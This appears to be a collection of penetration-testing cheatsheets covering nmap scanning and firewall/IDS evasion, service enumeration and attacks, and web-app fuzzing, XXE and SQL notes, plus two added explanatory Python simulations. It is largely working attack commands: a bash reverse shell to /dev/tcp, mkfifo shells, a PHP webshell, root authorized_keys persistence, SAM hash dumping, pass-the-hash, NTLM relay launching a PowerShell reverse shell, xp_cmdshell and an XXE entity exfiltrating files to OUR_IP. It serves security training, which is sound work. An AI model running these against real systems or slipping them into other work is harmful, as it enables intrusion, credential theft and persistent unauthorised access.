NMAP Cheatsheet

Nmap's TCP ACK scan (-sA) is much harder for firewalls and IDS/IPS systems to filter than a SYN scan (-sS) or a Connect scan (-sT), because it sends a TCP packet with only the ACK flag set. Whether a port is closed or open, the host must respond with an RST. Firewalls usually allow outgoing connections but block all connection attempts (packets with the SYN flag) arriving from external networks. Packets with the ACK flag, however, are often passed, because the firewall cannot determine whether the connection was originally established from the external or the internal network.

Decoys

There are cases in which administrators block specific subnets from different regions in principle. This prevents any access to the target network. Another example is when an IPS would block us. For these cases, the Decoy scanning method (-D) is the right choice. With this method, Nmap generates various random IP addresses and inserts them into the IP header to disguise the origin of the packets sent. We can generate a specific number (for example, 5) of random (RND) IP addresses, separated by a colon (:). Our real IP address is then placed at a random position among the generated IP addresses; in the next example, it ends up in the second position. Another critical point is that the decoys must be alive. Otherwise, the service on the target may become unreachable because of SYN-flooding protection mechanisms.

Scan by Using Decoys (Firewall and IDS/IPS Evasion)

forhau@htb[/htb]$ sudo nmap 10.129.2.28 -p 80 -sS -Pn -n --disable-arp-ping --packet-trace -D RND:5

Scan by Using a Different Source IP (Firewall and IDS/IPS Evasion)

forhau@htb[/htb]$ sudo nmap 10.129.2.28 -n -Pn -p 445 -O -S 10.129.2.200 -e tun0

DNS Proxying

By default, Nmap performs a reverse DNS resolution, unless otherwise specified, to find more information about our target. These DNS queries are usually passed as well, because the given web server is supposed to be found and visited. DNS queries are made over UDP port 53. TCP port 53 was previously used only for so-called "zone transfers" between DNS servers and for data transfers larger than 512 bytes. This is changing more and more with the spread of IPv6 and DNSSEC, and these changes cause many DNS requests to be made via TCP port 53.

However, Nmap still gives us a way to specify DNS servers ourselves (--dns-server ,). This method can be fundamental for us if we are in a demilitarized zone (DMZ). The company's DNS servers are usually more trusted than those on the Internet, so, for example, we could use them to interact with the hosts of the internal network. As another example, we can use TCP port 53 as the source port (--source-port) of our scans. If the administrator uses the firewall to control this port and the IDS/IPS does not filter it properly, our TCP packets will be trusted and passed through.

SYN Scan of a Filtered Port (Firewall and IDS/IPS Evasion)

forhau@htb[/htb]$ sudo nmap 10.129.2.28 -p50000 -sS -Pn -n --disable-arp-ping --packet-trace --source-port 53
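To make the filtering point of the ACK-scan and source-port-53 paragraphs concrete, here is an added example (not from the original cheatsheet) that runs one constructed packet trace through a toy stateless ACL and a toy stateful connection tracker; the addresses, ports and the list of published ports are assumptions.

```python
"""Added example, not part of the original cheatsheet: a toy packet filter that
runs the same constructed trace through a stateless ACL and a stateful
connection tracker, to show why ACK-only probes (-sA) and SYN probes sent from
source port 53 (--source-port 53) slip past the first but not the second.
All addresses, ports and the allowed-port list below are assumptions."""
from dataclasses import dataclass


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    flags: frozenset  # subset of {"SYN", "ACK", "RST"}


def is_internal(ip):
    """Hypothetical protected network 10.129.2.0/24."""
    return ip.startswith("10.129.2.")


def is_inbound(pkt):
    return not is_internal(pkt.src) and is_internal(pkt.dst)


def stateless_filter(pkt, allowed_inbound_ports=(80,)):
    """Classic stateless ACL: allow outbound traffic, allow inbound SYNs only to
    published ports, pass anything with ACK set (assumed to belong to an
    established flow) and trust anything coming from port 53 as a DNS reply.
    The last two rules are exactly what the nmap tricks above rely on."""
    if not is_inbound(pkt):
        return "pass"
    if pkt.sport == 53:
        return "pass"
    if "ACK" in pkt.flags:
        return "pass"
    if "SYN" in pkt.flags and pkt.dport in allowed_inbound_ports:
        return "pass"
    return "drop"


class StatefulFilter:
    """Connection tracker: a flow exists only after a permitted SYN was seen.
    ACK or RST packets for unknown flows are dropped regardless of source port."""

    def __init__(self, allowed_inbound_ports=(80,)):
        self.flows = set()
        self.allowed = set(allowed_inbound_ports)

    @staticmethod
    def flow_key(pkt):
        return frozenset({(pkt.src, pkt.sport), (pkt.dst, pkt.dport)})

    def process(self, pkt):
        key = self.flow_key(pkt)
        if "SYN" in pkt.flags and "ACK" not in pkt.flags:  # new connection
            if not is_inbound(pkt) or pkt.dport in self.allowed:
                self.flows.add(key)
                return "pass"
            return "drop"
        return "pass" if key in self.flows else "drop"


def evaluate(trace, allowed_inbound_ports=(80,)):
    """Return [(label, stateless_verdict, stateful_verdict), ...] for a trace."""
    tracker = StatefulFilter(allowed_inbound_ports)
    return [(label, stateless_filter(p, allowed_inbound_ports), tracker.process(p))
            for label, p in trace]


def evasions(results):
    """Labels of packets the stateless ACL passed but the stateful filter dropped."""
    return [label for label, sl, sf in results if sl == "pass" and sf == "drop"]


# Constructed sample trace: one legitimate TCP DNS lookup, three nmap probes, one client.
SAMPLE_TRACE = [
    ("internal host sends TCP DNS query", Packet("10.129.2.28", 40000, "8.8.8.8", 53, frozenset({"SYN"}))),
    ("DNS server replies SYN/ACK", Packet("8.8.8.8", 53, "10.129.2.28", 40000, frozenset({"SYN", "ACK"}))),
    ("nmap -sA probe to port 80", Packet("10.10.14.1", 44444, "10.129.2.28", 80, frozenset({"ACK"}))),
    ("nmap -sS probe to port 50000", Packet("10.10.14.1", 44444, "10.129.2.28", 50000, frozenset({"SYN"}))),
    ("nmap -sS --source-port 53 to port 50000", Packet("10.10.14.1", 53, "10.129.2.28", 50000, frozenset({"SYN"}))),
    ("legitimate client SYN to port 80", Packet("10.10.14.1", 50123, "10.129.2.28", 80, frozenset({"SYN"}))),
]

if __name__ == "__main__":
    for label, sl, sf in evaluate(SAMPLE_TRACE):
        print(f"{label:42} stateless={sl:4} stateful={sf}")
```

Only the two nmap tricks end up in the evasions list: the stateless ACL passes them, the connection tracker drops them because no permitted SYN ever created the flow.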

Scanning Options

Nmap Option Description
10.10.10.0/24 Target network range.
-sn Disables port scanning.
-Pn Disables ICMP Echo Requests
-n Disables DNS Resolution.
-PE Performs the ping scan by using ICMP Echo Requests against the target.
--packet-trace Shows all packets sent and received.
--reason Displays the reason for a specific result.
--disable-arp-ping Disables ARP Ping Requests.
--top-ports= Scans the specified top ports that have been defined as most frequent.
-p- Scan all ports.
-p22-110 Scan all ports between 22 and 110.
-p22,25 Scans only the specified ports 22 and 25.
-F Scans top 100 ports.
-sS Performs a TCP SYN scan.
-sA Performs a TCP ACK scan.
-sU Performs a UDP scan.
-sV Scans the discovered services for their versions.
-sC Perform a Script Scan with scripts that are categorized as "default".
--script SCRIPT Performs a Script Scan by using the specified scripts.
-O Performs an OS Detection Scan to determine the OS of the target.
-A Performs OS Detection, Service Detection, and traceroute scans.
-D RND:5 Sets the number of random Decoys that will be used to scan the target.
-e Specifies the network interface that is used for the scan.
-S 10.10.10.200 Specifies the source IP address for the scan.
-g Specifies the source port for the scan.
--dns-server DNS resolution is performed by using a specified name server.

Output Options

Nmap Option Description
-oA filename Stores the results in all available formats starting with the name of "filename".
-oN filename Stores the results in normal format with the name "filename".
-oG filename Stores the results in "grepable" format with the name of "filename".
-oX filename Stores the results in XML format with the name of "filename".

Performance Options

Nmap Option Description
--max-retries Sets the number of retries for scans of specific ports.
--stats-every=5s Displays scan's status every 5 seconds.
-v/-vv Displays verbose output during the scan.
--initial-rtt-timeout 50ms Sets the specified time value as initial RTT timeout.
--max-rtt-timeout 100ms Sets the specified time value as maximum RTT timeout.
--min-rate 300 Sets the number of packets that will be sent simultaneously.
-T <0-5> Specifies the specific timing template.

Pentesting Cheatsheet

When engaging in cybersecurity activities, such as penetration testing or vulnerability assessment, having a comprehensive toolkit of commands and scripts is essential. The following list provides a collection of commonly used commands across various stages of a cybersecurity engagement, including service scanning, web enumeration, exploiting public vulnerabilities, managing shells, escalating privileges, and transferring files. These commands are crucial for identifying potential vulnerabilities, exploiting them, and maintaining access to systems. They cover tools like nmap for network scanning, gobuster for web directory enumeration, Metasploit for exploiting known vulnerabilities, and netcat for establishing reverse shells. Additionally, they include methods for privilege escalation and file transfer, which are vital for post-exploitation activities. By mastering these commands, cybersecurity professionals can efficiently navigate and analyze systems to identify and address security weaknesses.

Basic Tools

Command Description
sudo openvpn user.ovpn Connect to VPN
ifconfig/ip a Show our IP address
netstat -rn Show networks accessible via the VPN
ssh user@10.10.10.10 SSH to a remote server
ftp 10.129.42.253 FTP to a remote server
tmux
tmux Start tmux
ctrl+b tmux: default prefix
prefix c tmux: new window
prefix 1 tmux: switch to window (1)
prefix shift+% tmux: split pane vertically
prefix shift+" tmux: split pane horizontally
prefix -> tmux: switch to the right pane
Vim
vim file vim: open file with vim
esc+i vim: enter insert mode
esc vim: back to normal mode
x vim: Cut character
dw vim: Cut word
dd vim: Cut full line
yw vim: Copy word
yy vim: Copy full line
p vim: Paste
:1 vim: Go to line number 1.
:w vim: Write the file (i.e. save)
:q vim: Quit
:q! vim: Quit without saving
:wq vim: Write and quit

Pentesting

Command Description
Service Scanning
nmap 10.129.42.253 Run nmap on an IP
nmap -sV -sC -p- 10.129.42.253 Run an nmap script scan on an IP
locate scripts/citrix List various available nmap scripts
nmap --script smb-os-discovery.nse -p445 10.10.10.40 Run an nmap script on an IP
netcat 10.10.10.10 22 Grab banner of an open port
smbclient -N -L \\10.129.42.253 List SMB Shares
smbclient \\10.129.42.253\users Connect to an SMB share
snmpwalk -v 2c -c public 10.129.42.253 1.3.6.1.2.1.1.5.0 Scan SNMP on an IP
onesixtyone -c dict.txt 10.129.42.254 Brute force SNMP secret string
Web Enumeration
gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt Run a directory scan on a website
gobuster dns -d inlanefreight.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt Run a sub-domain scan on a website
curl -IL https://www.inlanefreight.com Grab website banner
whatweb 10.10.10.121 List details about the webserver/certificates
curl 10.10.10.121/robots.txt List potential directories in robots.txt
ctrl+U View page source (in Firefox)
Public Exploits
searchsploit openssh 7.2 Search for public exploits for a web application
msfconsole MSF: Start the Metasploit Framework
search exploit eternalblue MSF: Search for public exploits in MSF
use exploit/windows/smb/ms17_010_psexec MSF: Start using an MSF module
show options MSF: Show required options for an MSF module
set RHOSTS 10.10.10.40 MSF: Set a value for an MSF module option
check MSF: Test if the target server is vulnerable
exploit MSF: Run the exploit against the target server
Using Shells
nc -lvnp 1234 Start a nc listener on a local port
bash -c 'bash -i >& /dev/tcp/10.10.10.10/1234 0>&1' Send a reverse shell from the remote server
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f /bin/sh -i 2>&1
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f /bin/bash -i 2>&1
nc 10.10.10.1 1234 Connect to a bind shell started on the remote server
python -c 'import pty; pty.spawn("/bin/bash")' Upgrade shell TTY (1)
ctrl+z then stty raw -echo then fg then enter twice Upgrade shell TTY (2)
echo "" > /var/www/html/shell.php Create a webshell php file
curl http://SERVER_IP:PORT/shell.php?cmd=id Execute a command on an uploaded webshell
Privilege Escalation
./linpeas.sh Run linpeas script to enumerate remote server
sudo -l List available sudo privileges
sudo -u user /bin/echo Hello World! Run a command with sudo
sudo su - Switch to root user (if we have access to sudo su)
sudo su user - Switch to a user (if we have access to sudo su)
ssh-keygen -f key Create a new SSH key
echo "ssh-rsa AAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys Add the generated public key to the user
ssh root@10.10.10.10 -i key SSH to the server with the generated private key
Transferring Files
python3 -m http.server 8000 Start a local webserver
wget http://10.10.14.1:8000/linpeas.sh Download a file on the remote server from our local machine
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh Download a file on the remote server from our local machine
scp linenum.sh user@remotehost:/tmp/linenum.sh Transfer a file to the remote server with scp (requires SSH access)
base64 shell -w 0 Convert a file to base64
echo f0VMR...SNIP...InmDwU | base64 -d > shell Decode the base64 string back into the original file
md5sum shell Check the file's md5sum to ensure it converted correctly

Foothold Cheatsheet

Initial Foothold

In technical workflows, efficiency often hinges on recalling precise commands, flags, or syntax. These cheatsheets condense essential tools, techniques, and workflows into actionable quick-reference guides, designed to save time and reduce friction. Whether you’re scanning networks, automating tasks, or troubleshooting systems, use this curated collection as your "initial foothold" for rapid execution—eliminating guesswork and keeping critical information at your fingertips. Bookmark, print, or memorize these shortcuts to streamline your process and stay focused on results.

Infrastructure-based Enumeration

Command Description
curl -s https://crt.sh/\?q\=\&output\=json | jq . Query crt.sh (Certificate Transparency logs) for the domain and pretty-print the JSON result.
for i in $(cat ip-addresses.txt);do shodan host $i;done Scan each IP address in a list using Shodan.

Host-based Enumeration

FTP

Command Description
ftp Interact with the FTP service on the target.
nc -nv 21 Interact with the FTP service on the target.
telnet 21 Interact with the FTP service on the target.
openssl s_client -connect :21 -starttls ftp Interact with the FTP service on the target using encrypted connection.
wget -m --no-passive ftp://anonymous:anonymous@ Download all available files on the target FTP server.

SMB

Command Description
smbclient -N -L // Null session authentication on SMB.
smbclient /// Connect to a specific SMB share.
rpcclient -U "" Interaction with the target using RPC.
samrdump.py Username enumeration using Impacket scripts.
smbmap -H Enumerating SMB shares.
crackmapexec smb --shares -u '' -p '' Enumerating SMB shares using null session authentication.
enum4linux-ng.py -A SMB enumeration using enum4linux.

NFS

Command Description
showmount -e Show available NFS shares.
mount -t nfs :/ ./target-NFS/ -o nolock Mount the specific NFS share.
umount ./target-NFS Unmount the specific NFS share.

DNS

Command Description
dig ns @ NS request to the specific nameserver.
dig any @ ANY request to the specific nameserver.
dig axfr @ AXFR request to the specific nameserver.
dnsenum --dnsserver --enum -p 0 -s 0 -o found_subdomains.txt -f ~/subdomains.list Subdomain brute forcing.

SMTP

Command Description
telnet 25 Interact with the SMTP service on the target.

IMAP/POP3

Command Description
curl -k 'imaps://' --user : Log in to the IMAPS service using cURL.
openssl s_client -connect :imaps Connect to the IMAPS service.
openssl s_client -connect :pop3s Connect to the POP3s service.

SNMP

Command Description
snmpwalk -v2c -c Querying OIDs using snmpwalk.
onesixtyone -c community-strings.list Bruteforcing community strings of the SNMP service.
braa @:.1.* Bruteforcing SNMP service OIDs.

MySQL

Command Description
mysql -u -p -h Login to the MySQL server.

MSSQL

Command Description
mssqlclient.py @ -windows-auth Log in to the MSSQL server using Windows authentication.

IPMI

Command Description
msf6 auxiliary(scanner/ipmi/ipmi_version) IPMI version detection.
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) Dump IPMI hashes.

Linux Remote Management

Command Description
ssh-audit.py Remote security audit against the target SSH service.
ssh @ Log in to the SSH server using the SSH client.
ssh -i private.key @ Log in to the SSH server using private key.
ssh @ -o PreferredAuthentications=password Enforce password-based authentication.

Windows Remote Management

Command Description
rdp-sec-check.pl Check the security settings of the RDP service.
xfreerdp /u: /p:"" /v: Log in to the RDP server from Linux.
evil-winrm -i -u -p Log in to the WinRM server.
wmiexec.py :""@ "" Execute command using the WMI service.

Oracle TNS

Command Description
./odat.py all -s Perform a variety of scans to gather information about the Oracle database services and its components.
sqlplus /@/ Log in to the Oracle database.
./odat.py utlfile -s -d -U -P --sysdba --putFile C:\insert\path file.txt ./file.txt Upload a file with Oracle RDBMS.

Attacking FTP

Command Description
ftp 192.168.2.142 Connecting to the FTP server using the ftp client.
nc -v 192.168.2.142 21 Connecting to the FTP server using netcat.
hydra -l user1 -P /usr/share/wordlists/rockyou.txt ftp://192.168.2.142 Brute-forcing the FTP service.

Attacking SMB

Command Description
smbclient -N -L //10.129.14.128 Null-session testing against the SMB service.
smbmap -H 10.129.14.128 Network share enumeration using smbmap.
smbmap -H 10.129.14.128 -r notes Recursive network share enumeration using smbmap.
smbmap -H 10.129.14.128 --download "notes\note.txt" Download a specific file from the shared folder.
smbmap -H 10.129.14.128 --upload test.txt "notes\test.txt" Upload a specific file to the shared folder.
rpcclient -U'%' 10.10.110.17 Null-session with the rpcclient.
./enum4linux-ng.py 10.10.11.45 -A -C Automated enumeration of the SMB service using enum4linux-ng.
crackmapexec smb 10.10.110.17 -u /tmp/userlist.txt -p 'Company01!' Password spraying against different users from a list.
impacket-psexec administrator:'Password123!'@10.10.110.17 Connect to the SMB service using the impacket-psexec.
crackmapexec smb 10.10.110.17 -u Administrator -p 'Password123!' -x 'whoami' --exec-method smbexec Execute a command over the SMB service using crackmapexec.
crackmapexec smb 10.10.110.0/24 -u administrator -p 'Password123!' --loggedon-users Enumerating Logged-on users.
crackmapexec smb 10.10.110.17 -u administrator -p 'Password123!' --sam Extract hashes from the SAM database.
crackmapexec smb 10.10.110.17 -u Administrator -H 2B576ACBE6BCFDA7294D6BD18041B8FE Use the Pass-The-Hash technique to authenticate on the target host.
impacket-ntlmrelayx --no-http-server -smb2support -t 10.10.110.146 Dump the SAM database using impacket-ntlmrelayx.
impacket-ntlmrelayx --no-http-server -smb2support -t 192.168.220.146 -c 'powershell -e Execute a PowerShell based reverse shell using impacket-ntlmrelayx.

Attacking SQL Databases

Command Description
mysql -u julio -pPassword123 -h 10.129.20.13 Connecting to the MySQL server.
sqlcmd -S SRVMSSQL\SQLEXPRESS -U julio -P 'MyPassword!' -y 30 -Y 30 Connecting to the MSSQL server.
sqsh -S 10.129.203.7 -U julio -P 'MyPassword!' -h Connecting to the MSSQL server from Linux.
sqsh -S 10.129.203.7 -U .\julio -P 'MyPassword!' -h Connecting to the MSSQL server from Linux while Windows Authentication mechanism is used by the MSSQL server.
mysql> SHOW DATABASES; Show all available databases in MySQL.
mysql> USE htbusers; Select a specific database in MySQL.
mysql> SHOW TABLES; Show all available tables in the selected database in MySQL.
mysql> SELECT * FROM users; Select all available entries from the "users" table in MySQL.
sqlcmd> SELECT name FROM master.dbo.sysdatabases Show all available databases in MSSQL.
sqlcmd> USE htbusers Select a specific database in MSSQL.
sqlcmd> SELECT * FROM htbusers.INFORMATION_SCHEMA.TABLES Show all available tables in the selected database in MSSQL.
sqlcmd> SELECT * FROM users Select all available entries from the "users" table in MSSQL.
sqlcmd> EXECUTE sp_configure 'show advanced options', 1 To allow advanced options to be changed.
sqlcmd> EXECUTE sp_configure 'xp_cmdshell', 1 To enable the xp_cmdshell.
sqlcmd> RECONFIGURE To be used after each sp_configure command to apply the changes.
sqlcmd> xp_cmdshell 'whoami' Execute a system command from MSSQL server.
mysql> SELECT "" INTO OUTFILE '/var/www/html/webshell.php' Create a file using MySQL.
mysql> show variables like "secure_file_priv"; Check whether secure_file_priv is empty, which allows locally stored files on the system to be read.
sqlcmd> SELECT * FROM OPENROWSET(BULK N'C:/Windows/System32/drivers/etc/hosts', SINGLE_CLOB) AS Contents Read local files in MSSQL.
mysql> select LOAD_FILE("/etc/passwd"); Read local files in MySQL.
sqlcmd> EXEC master..xp_dirtree '\\10.10.110.17\share\' Hash stealing using the xp_dirtree command in MSSQL.
sqlcmd> EXEC master..xp_subdirs '\\10.10.110.17\share\' Hash stealing using the xp_subdirs command in MSSQL.
sqlcmd> SELECT srvname, isremote FROM sysservers Identify linked servers in MSSQL.
sqlcmd> EXECUTE('select @@servername, @@version, system_user, is_srvrolemember(''sysadmin'')') AT [10.0.0.12\SQLEXPRESS] Identify the user and its privileges used for the remote connection in MSSQL.

Attacking RDP

Command Description
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123' Password spraying against the RDP service.
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp Brute-forcing the RDP service.
rdesktop -u admin -p password123 192.168.2.143 Connect to the RDP service using rdesktop in Linux.
tscon #{TARGET_SESSION_ID} /dest:#{OUR_SESSION_NAME} Impersonate a user without its password.
net start sessionhijack Execute the RDP session hijack.
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f Enable "Restricted Admin Mode" on the target Windows host.
xfreerdp /v:192.168.2.141 /u:admin /pth:A9FDFA038C4B75EBC76DC855DD74F0DA Use the Pass-The-Hash technique to login on the target host without a password.

Attacking DNS

Command Description
dig AXFR @ns1.inlanefreight.htb inlanefreight.htb Perform an AXFR zone transfer attempt against a specific name server.
subfinder -d inlanefreight.com -v Brute-forcing subdomains.
host support.inlanefreight.com DNS lookup for the specified subdomain.

Attacking Email Services

Command Description
host -t MX microsoft.com DNS lookup for mail servers for the specified domain.
dig mx inlanefreight.com | grep "MX" DNS lookup for mail servers for the specified domain, filtered to the MX lines.
host -t A mail1.inlanefreight.htb. DNS lookup of the IPv4 address for the specified subdomain.
telnet 10.10.110.20 25 Connect to the SMTP server.
smtp-user-enum -M RCPT -U userlist.txt -D inlanefreight.htb -t 10.129.203.7 SMTP user enumeration using the RCPT command against the specified host.
python3 o365spray.py --validate --domain msplaintext.xyz Verify the usage of Office365 for the specified domain.
python3 o365spray.py --enum -U users.txt --domain msplaintext.xyz Enumerate existing users using Office365 on the specified domain.
python3 o365spray.py --spray -U usersfound.txt -p 'March2022!' --count 1 --lockout 1 --domain msplaintext.xyz Password spraying against a list of users that use Office365 for the specified domain.
hydra -L users.txt -p 'Company01!' -f 10.10.110.20 pop3 Brute-forcing the POP3 service.
swaks --from notifications@inlanefreight.com --to employees@inlanefreight.com --header 'Subject: Notification' --body 'Message' --server 10.10.11.213 Testing the SMTP service for the open-relay vulnerability.

Web Application Cheatsheet

Web application penetration testing is a critical security practice designed to identify and exploit vulnerabilities in web applications, simulating real-world attacks to assess their resilience against cyber threats. This method involves a thorough examination of the application's architecture, from the user interface to the underlying codebase, to uncover potential security gaps that could be exploited by malicious actors. By mimicking the tactics, techniques, and procedures (TTPs) used by hackers, penetration testers provide actionable insights into an application's security posture, helping organizations strengthen their defenses and comply with industry standards like PCI-DSS. This proactive approach not only enhances security but also reduces the risk of data breaches and financial losses, ensuring that sensitive data remains protected.

Checklist:

- Client-side validation — Checks may not be replicated on the server
- Database interaction — SQL injection
- File uploading and downloading — Path traversal vulnerabilities, stored cross-site scripting
- Display of user-supplied data — Cross-site scripting
- Dynamic redirects — Redirection and header injection attacks
- Social networking features — Username enumeration, stored cross-site scripting
- Login — Username enumeration, weak passwords, ability to use brute force
- Multistage login — Logic flaws
- Session state — Predictable tokens, insecure handling of tokens
- Access controls — Horizontal and vertical privilege escalation
- User impersonation functions — Privilege escalation
- Use of cleartext communications — Session hijacking, capture of credentials and other sensitive data
- Off-site links — Leakage of query string parameters in the Referer header
- Interfaces to external systems — Shortcuts in the handling of sessions and/or access controls
- Error messages — Information leakage
- E-mail interaction — E-mail and/or command injection
- Native code components or interaction — Buffer overflows
- Use of third-party application components — Known vulnerabilities
- Identifiable web server software — Common configuration weaknesses, known software bugs

For cloud pentesting, check the Pacu tool: https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details

Enumeration

with raw HTTP request from BURP repeater:

POST /login.php HTTP/1.1
Host: target.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

username=admin&password=FUZZ

save it into req.txt and perform the login bruteforce:

ffuf -request req.txt -w /path/to/passwords.txt

To fuzz multiple parameters in the request, you can use multiple FUZZ keywords and specify the corresponding wordlists with the -w option. For example, if you want to fuzz both the username and password parameters, you can use the following command:

ffuf -request req.txt -w usernames.txt:UFUZZ -w passwords.txt:PFUZZ -fs 4242

This will use the usernames.txt wordlist for the UFUZZ keyword and the passwords.txt wordlist for the PFUZZ keyword.

How to filter:

-mc 200 match HTTP 200

-fs 4242 filter content size 4242

-fr "invalid" filter by responses matching regex "invalid"

-r Follow redirects, default to false

Spidering through BURP in 8080:

ffuf.exe -request .\req.txt -w .\directories.txt -x http://127.0.0.1:8080

Different modes (like in BURP Intruder)

ffuf.exe -request .\req.txt -request-proto http -w bytes.txt:BFUZZ -w passwords.txt:PFUZZ -mode pitchfork

Multi-wordlist operation mode. Available modes: clusterbomb, pitchfork, sniper (default: clusterbomb)
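To show what the three multi-wordlist modes actually send for the req.txt template above, here is an added example (not from the original cheatsheet, not ffuf's code) that expands the request for each mode and recomputes Content-Length; the wordlists are constructed samples, and sniper follows the Burp Intruder definition of one position at a time with the others left at a base value.

```python
"""Added example, not part of the original cheatsheet: generates the request
set that the three multi-wordlist modes (clusterbomb, pitchfork, sniper) would
send for the req.txt template above, and recomputes Content-Length for each
rendered body. Wordlists are constructed samples; sniper follows the Burp
Intruder definition (one position at a time, the rest at a base value)."""
import itertools

# Template modelled on the req.txt above, with both parameters fuzzed.
RAW_REQUEST = (
    "POST /login.php HTTP/1.1\r\n"
    "Host: target.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Content-Length: 27\r\n"
    "\r\n"
    "username=UFUZZ&password=PFUZZ"
)

# Constructed sample wordlists, keyed by the keyword they replace (insertion order matters).
WORDLISTS = {
    "UFUZZ": ["admin", "root", "guest"],
    "PFUZZ": ["123456", "password", "letmein", "Spring2024!"],
}


def render(template, values):
    """Substitute each keyword and fix Content-Length, which changes with every
    candidate; a stale length makes the server read a truncated or padded body."""
    head, _, body = template.partition("\r\n\r\n")
    for keyword, value in values.items():
        head = head.replace(keyword, value)
        body = body.replace(keyword, value)
    headers = [h for h in head.split("\r\n") if not h.lower().startswith("content-length:")]
    headers.append(f"Content-Length: {len(body.encode())}")
    return "\r\n".join(headers) + "\r\n\r\n" + body


def combinations(wordlists, mode, base=None):
    """Yield {keyword: candidate} mappings in the order the chosen mode sends them."""
    keys = list(wordlists)
    if mode == "clusterbomb":      # every combination: cartesian product of all lists
        for combo in itertools.product(*(wordlists[k] for k in keys)):
            yield dict(zip(keys, combo))
    elif mode == "pitchfork":      # i-th entry of every list together; stops at the shortest list
        for combo in zip(*(wordlists[k] for k in keys)):
            yield dict(zip(keys, combo))
    elif mode == "sniper":         # one position at a time, others at their base value
        base = base or {k: "" for k in keys}
        for k in keys:
            for candidate in wordlists[k]:
                values = dict(base)
                values[k] = candidate
                yield values
    else:
        raise ValueError(f"unknown mode: {mode}")


def generate(template, wordlists, mode):
    """Return the fully rendered requests for a mode."""
    return [render(template, v) for v in combinations(wordlists, mode)]


def request_counts(wordlists):
    """Requests per mode: useful for sizing a test window against a lockout policy."""
    return {m: sum(1 for _ in combinations(wordlists, m))
            for m in ("clusterbomb", "pitchfork", "sniper")}


if __name__ == "__main__":
    print(request_counts(WORDLISTS))
    print(generate(RAW_REQUEST, WORDLISTS, "pitchfork")[0])
```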

Ffuf

Command Description
ffuf -h ffuf help
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ Directory Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/indexFUZZ Extension Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/blog/FUZZ.php Page Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://SERVER_IP:PORT/FUZZ -recursion -recursion-depth 1 -e .php -v Recursive Fuzzing
ffuf -w wordlist.txt:FUZZ -u https://FUZZ.hackthebox.eu/ Sub-domain Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://academy.htb:PORT/ -H 'Host: FUZZ.academy.htb' -fs xxx VHost Fuzzing
ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php?FUZZ=key -fs xxx Parameter Fuzzing - GET
ffuf -w wordlist.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'FUZZ=key' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx Parameter Fuzzing - POST
ffuf -w ids.txt:FUZZ -u http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=FUZZ' -H 'Content-Type: application/x-www-form-urlencoded' -fs xxx Value Fuzzing
ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://192.168.10.10/FOLDERS/WORDLISTEXTENSIONS Crawl with:
-found folders in previous scan (dirlisting alias)
-cewl wordlist (generatelist alias)
-raft-* list for extensions, or known extension

Wordlists

Command Description
/opt/useful/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt Directory/Page Wordlist
/opt/useful/SecLists/Discovery/Web-Content/web-extensions.txt Extensions Wordlist
/opt/useful/SecLists/Discovery/DNS/subdomains-top1million-5000.txt Subdomain Wordlist
/opt/useful/SecLists/Discovery/DNS/namelist.txt Domain Wordlist
/opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt Parameters Wordlist
/opt/share/seclists/Discovery/Web-Content/raft-* folders, words, extensions

Misc

Command Description
sudo sh -c 'echo "SERVER_IP academy.htb" >> /etc/hosts' Add DNS entry
for i in $(seq 1 1000); do echo $i >> ids.txt; done Create Sequence Wordlist
curl http://admin.academy.htb:PORT/admin/admin.php -X POST -d 'id=key' -H 'Content-Type: application/x-www-form-urlencoded' curl w/ POST

HTTP

HTTP Verb Tampering

HTTP Methods:

- HEAD
- PUT
- DELETE
- OPTIONS
- PATCH

Command Description
-X OPTIONS Set HTTP Method with Curl

IDOR

Identifying IDORs:

- In URL parameters and APIs
- In AJAX calls
- By understanding reference hashing/encoding
- By comparing user roles

Command Description
md5sum MD5 hash a string
base64 Base64 encode a string

XXE

Code Description
<!ENTITY xxe SYSTEM "http://localhost/email.dtd"> Define External Entity to a URL
<!ENTITY xxe SYSTEM "file:///etc/passwd"> Define External Entity to a file path
<!ENTITY company SYSTEM "php://filter/convert.base64-encode/resource=index.php"> Read PHP source code with base64 encode filter
<!ENTITY % error "<!ENTITY content SYSTEM '%nonExistingEntity;/%file;'>"> Reading a file through a PHP error
<!ENTITY % oob "<!ENTITY content SYSTEM 'http://OUR_IP:8000/?content=%file;'>"> Reading a file via OOB exfiltration
&xxe; Reference External Entity

SQLi

MySQL

Command Description
General
mysql -u root -h docker.hackthebox.eu -P 3306 -p login to mysql database
SHOW DATABASES List available databases
USE users Switch to database
Tables
CREATE TABLE logins (id INT, ...) Add a new table
SHOW TABLES List available tables in current database
DESCRIBE logins Show table properties and columns
INSERT INTO table_name VALUES (value_1,..) Add values to table
